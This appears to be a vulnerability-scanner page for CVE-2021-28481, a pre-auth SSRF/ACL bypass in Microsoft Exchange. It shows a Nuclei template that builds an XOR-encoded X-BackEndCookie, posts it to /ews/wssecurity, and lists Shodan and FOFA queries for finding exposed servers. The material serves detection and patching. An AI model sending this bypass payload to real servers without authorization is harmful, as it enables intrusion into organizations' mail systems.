Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
CVE-2021-28481
Verified
Description
Microsoft Exchange Server contains a remote code execution vulnerability caused by improper input validation in the server component, letting remote attackers execute arbitrary code. Exploitation requires network access to the server.
Severity
Critical
CVSS Score
9.8
Exploit Probability
34%
Affected Product
exchange_server
Published Date
January 20, 2026
Template Author
daffainfo
CVE-2021-28481.yaml
id: CVE-2021-28481

info:
  name: Microsoft Exchange - Pre-Auth SSRF / ACL Bypass (ProxyNotFound)
  author: daffainfo
  severity: critical
  description: |
    Microsoft Exchange Server contains a remote code execution caused by improper input validation in the server component, letting remote attackers execute arbitrary code, exploit requires network access to the server.
  impact: |
    Attackers can execute arbitrary code remotely, potentially leading to full system compromise or data breach
  remediation: |
    Apply the latest security patches and updates provided by Microsoft for Exchange Server
  reference:
    - https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
    - https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
    - https://www.youtube.com/watch?v=vn4niT9XEIM
    - https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28481
    - https://nvd.nist.gov/vuln/detail/cve-2021-28481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-28481
    cwe-id: D-CWE-noinfo
    epss-score: 0.34359
    epss-percentile: 0.97053
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*,cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,ssrf,rce,exchange,microsoft,vkev

variables:
  email: '{{rand_base(5)}}@{{rand_base(5)}}.com'
  epoch: '{{unix_time()}}'
  date: '{{date_time("%Y-%M-%DT%H:%m:%s")}}'

flow: |
  http(1)
  let servername = template.servername;
  let epoch = template.epoch;
  let date = template.date;
  let str = "Server~x]@" + servername.toLowerCase() + ":444/owa/auth/logon.aspx?a.a#~" + epoch + "~" + date;
  let result = "";
  for (let i = 0; i < str.length; i++) {
    let xorChar = str.charCodeAt(i) ^ 0xff;
    result += xorChar.toString(16).padStart(2, "0");
  }
  set("rawXor", result);
  http(2)

http:
  - raw:
      - |
        GET /owa/ HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(to_lower(header), "x-feserver")'
        condition: and
        internal: true
    extractors:
      - type: kval
        name: servername
        kval:
          - x_feserver
        internal: true

  - raw:
      - |
        POST /ews/wssecurity HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-BackEndCookie={{email}}={{base64(hex_decode(rawXor))}}
        X-AnchorMailbox: {{email}}
        Content-Type: application/x-www-form-urlencoded
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "/owa/auth/errorFE.aspx"
        condition: and
      - type: word
        part: header
        words:
          - "X-Calculatedbetarget"
          - "X-Owa-Error"
        condition: and
        case-insensitive: true
      - type: status
        status:
          - 302
# digest: 490a0046304402200b240e1f4fe341cd0e657b7d6802bc5367ea35dccaf4072f0a77ed2438ac40c902207ea8f160b814e3265577e20b6bbe01670002354fe74086d90f33cc818b7d85b2:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2021-28481
CWE ID:
d-cwe-noinfo
References
https://sec.vnpt.vn/2021/04/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482
https://hitcon.org/2021/agenda/279d7810-e619-4dc3-9113-b11bad5277ec/The%20Proxy%20Era%20of%20Microsoft%20Exchange%20Server.pdf
https://www.youtube.com/watch?v=vn4niT9XEIM
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2021-28481
https://nvd.nist.gov/vuln/detail/cve-2021-28481
Remediation Steps
Apply the latest security patches and updates provided by Microsoft for Exchange Server